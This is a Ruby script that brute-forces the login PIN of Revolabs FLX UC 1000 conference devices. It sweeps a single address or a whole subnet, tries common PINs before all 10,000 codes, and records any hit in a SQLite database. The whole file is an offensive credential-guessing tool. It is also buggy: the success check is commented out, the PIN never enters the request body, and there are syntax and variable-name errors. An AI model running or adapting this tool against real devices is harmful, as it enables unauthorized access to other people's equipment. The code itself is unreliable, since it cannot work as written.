#!/usr/bin/env ruby ## bf_login.rb - brute force the login for the revolabs flx UC 1000 require 'json' require 'net/http' require 'sequel' require 'uri' class BfLogin attr_reader :address, :dbh, :errors, :responses def initialize(address) @address = address @errors = Array.new @responses = Array.new db = 'bf_login.db' @dbh = Sequel.connect(sprintf('sqlite://%s', db)) end def initialize_db @db.create_table? :pins do primary_key :id String :ip String :pin Date :created end end def add_pin_to_db(ip, pin) @dbh[:pins].insert( :ip => ip, :pin => pin, :created => Time.now, ) end # return a Net::HTTP::Post request suitable for validating +pin+ def get_request(uri, pin) request = Net::HTTP::Post.new(uri.request_uri) request['Accept'] = 'application/json, text/plain, */*' request['Accept-Encoding'] = 'gzip, deflate' request['Accept-Language'] = 'en-US,en;q=0.8' request['Connection'] = 'keep-alive' request['Content-Type'] = 'multipart/form-data; boundary=---------------------------7da24f2e50046;charset=UTF-8' request['Origin'] = sprintf('http://%s', uri.host) request['Referer'] = sprintf('http://%s/login', uri.host) request['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36' # TODO determine necessity of this, given fuzzing, it's probably unnecessary request['Cookie'] = sprintf('_ga=GA1.4.595462255.%s', Time.now.to_i) body = Array.new body << '-----------------------------7da24f2e50046' # this is a magic number: https://stackoverflow.com/questions/37701805/ie11-content-type-false-in-ie11-it-doesnt-work body << 'Content-Disposition: form-data; name="file"; filename="temp.txt"' # TODO should look into what happens when we point at a different file.. body << 'Content-type: plain/text' body << '' # newline body << sprintf('', pin) body << '-----------------------------7da24f2e50046' request.body = body.join("\r\n") request end # return True|False def check_pin(url, pin) uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = get_request(uri, pin) response = http.request(request) # response.body.match(/1/) ? true : false end end # ## main() address = ARGV.first if address.nil? puts sprintf('usage: %s ', __FILE__) puts sprintf(' %s', __FILE__) puts sprintf(' %s 192.168.1.*', __FILE__) exit 1 end mode = address.match(/^(?:\d{1,3}){3}\.\d{1,3}$/) ? :ip : :range targets = Array.new if mode.eql?(:ip) targets << address elsif mode.eql?(:range) base = address.split('.')[0..2].join('.') 1.upto(254) do |octet| targets << sprintf('%s.%s', base, octet) end end _pins = Hash.new 9999.downto(0).to_a each do |i| _pins[i] = 1 end prioritized = [1234, 2546, 1739, 9876, 1425, 4152] # commonly used PINs # TODO come up with way to generate patterns - keys that are nearby, incremental/decremental ranges # commonly used PINs that follow a pattern 0.upto(9) do |i| prioritized << i * 1111 end # TODO this is broken, once we delete/add, we change the order.. use a set instead? could go poor man hash style.. prioritized.each do |p| _pins.delete(p) end pins = [ prioritized, _pins.keys ].flatten # hackery targets.each do |target| app = BfLogin.new(target) url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', target) puts sprintf('url: [%s]', url) pins.each do |i| pin = sprintf('%04d', i) begin puts sprintf(' trying pin[%s]', pin) response = app.check_pin(url, pin) app.responses << { :ip => target, :pin => pin, :results => response } if response app.add_pin_to_db(target, pin) puts sprintf('INFO: found PIN[%s] for [%s]', pin, target) break end # this was necessary when testing against a local server, but not against real devices #sleep 1 if (i % 100).eql?(0) rescue => e puts sprintf('ERROR: something bad happened on pin[%s]: [%s:%s]', pin, e.class, e.message) app.errors << { :exception => e, :pin => pin } end end unless app.errors.empty? app.errors.each do |e| puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception]) end puts sprintf('ERROR: [%d] total errors', app.errors.size) else # TODO this is going to get lost in the console output when running against multiple targets -- should we stop printing the PINs attempted? puts sprintf('tested[%s] PINs, found correct one[%s]', app.responses.size, ) end end